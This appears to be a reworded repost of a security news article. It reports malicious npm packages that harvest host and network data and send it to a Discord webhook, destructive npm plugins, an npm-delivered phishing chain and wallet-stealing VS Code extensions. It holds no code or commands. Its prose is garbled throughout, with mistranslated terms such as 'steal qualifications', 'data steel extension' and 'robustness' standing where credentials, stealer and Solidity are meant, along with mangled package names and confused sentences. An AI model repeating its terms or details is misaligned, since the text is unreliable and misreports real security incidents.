The package registry has discovered up to 60 malicious NPM packages in a package registry with malicious capabilities to harvest hostnames, IP addresses, DNS servers, and endpoints that control host names, IP addresses, DNS servers, and user directories inconsistently.
Packages published on three different accounts come with installation time scripts that are triggered during NPM installation, socket security researcher Kirill Boychenko said in a report published last week. The library has been downloaded collectively over 3,000 times.
“Scripts are targeted at Windows, MacOS, or Linux systems, and include basic sandbox emergency checks and are a potential source of valuable reconnaissance for all infected workstations or continuous integration nodes,” the software supply chain security company said.
The names of the three accounts each published 20 packages within an 11-day period, listed below. Account no longer exists in npm –
BBB335656 CDSFDFAFD1232436437, and SDSDS656565
Malicious code is explicitly designed to fingerprint every machine on a socket that installs the package, but will abort it if it detects it running in a virtualized environment related to Amazon, Google, etc.
Harvested information including host details, system DNS server, network interface card (NIC) information, and internal and external IP addresses are sent to the Discord Webhook.
“By harvesting internal and external IP addresses, DNS servers, usernames and project paths, we can help threat actors chart their networks and identify valuable targets for future campaigns,” Boychenko said.
This disclosure follows another set of eight npm packages that disguise the helper libraries for widely used JavaScript frameworks, such as React, Vue.JS, Vite, Node.js, and the open source quill editor, but deploys the installed destructive payload. They have been downloaded over 6,200 times and can be downloaded from the repository –
Vite-Plugin-Vue-Extend Quill-Image-Downolder JS-Hood JS-Bum-Bum-Plugin-Bumb-Plugin-Bomb-Plugin-Bomb-Plugin-Bomb-Extend, and Vite-Plugin-react-Extend
“While secretly containing destructive payloads designed to destroy data, delete important files and remove crash systems, these packages remained undetected, pose as legitimate plugins and utilities,” said socket security researcher Kush Pandya.
Some of the identified packages are known to run automatically when the developer calls them in the project, allowing for recursive deletion of files related to Vue.js, React, and Vite. Others are designed to tamper with corrupted basic JavaScript methods and browser storage mechanisms such as LocalStorage, SessionStorage, and cookies.
Another notable package is JS-Bomb. This does not only remove the Vue.js framework file by initiating a system shutdown based on the current run time.
This activity comes from a threat actor named Xuxingfeng. Xuxingfeng publishes five legitimate, non-malicious packages that work as intended. Some of the Rogue packages were released in 2023. “This dual approach of releasing both harmful and useful packages creates a legitimacy façade that makes it more likely that you’ll trust and install malicious packages,” says Pandya.
The findings continue to discover new attack campaigns that combine traditional email phishing with JavaScript code, part of a malicious NPM package disguised as a benign open source library.
“Once communication was established, the package loaded and delivered a second-stage script with customized phishing links using the victim’s email address, leading to a fake office 365 login page designed to steal qualifications.”
The starting point of the attack is a phishing email containing a malicious .htm file hosted on JSDELIVR and containing encrypted JavaScript code associated with an NPM package named CitiyCar8. Once installed, it uses the JavaScript payload embedded within the package to initiate a URL redirect chain, eventually leading the user to a fake landing page designed to capture the credentials.
“This phishing attack shows a high level of refinement, with threat actors linking technologies like AES encryption, NPM packages delivered via CDNs, and multiple redirects to hide malicious intent,” Cerda said.
“The attack not only shows a creative way for attackers to avoid detection, but also highlights the importance of vigilance in the ever-evolving landscape of cybersecurity threats.”
Abuse of open source repositories for malware distribution has become a proven approach to implementing supply chain attacks at scale. Over the past few weeks, Microsoft’s Visual Studio Code (VS Code) Marketplace has also revealed a malicious data steel extension that designed Cryptocurrency Wallet Credentials targeting Windows Solidity Developers.
This activity is attributed to a threat actor tracked as MUT-9332 by Datadog Security Survey. The extension is named as follows:
solaibot on-eth, and blankebesxstnion
“Extensions hide harmful code within legitimate functionality and use command and control domains that appear to be related to robustness, and are not usually flagged as malicious,” DataDog researchers said.
“All three extensions employ complex infection chains that contain multiple stages of obfuscated malware, including those that use payloads hidden within image files hosted in Internet archives.”
Specifically, the extension was touted as providing syntax scanning and vulnerability detection to robustness developers. Although it offers authentic features, the extension is designed to provide a malicious payload that steals cryptocurrency wallet credentials from victim Windows systems. Three extensions were then removed.
The ultimate goal of the VS Code extension is to slip malicious chrome-based browser extensions that can plunder Ethereum wallets and leak to command and control (C2) endpoints.
It is also equipped to install another executable that captures keystrokes and scans the application data directory for Discord, Chromium-based browsers, cryptocurrency wallets and electronic applications.
MUT-9332 is rated behind a recently disclosed campaign that uses 10 malicious code extensions to install Xmrig Cryptominer by passing it as a coding or artificial intelligence (AI) tool.
“This campaign shows an incredible creative length that MUT-9332 willing to hide their malicious intentions,” Datadog said. “Updates to these payloads suggest that this campaign is likely to continue, and detection and removal of the first batch of this malicious code extension could encourage MUT-9332 to change tactics for subsequent tactics.”
Source link
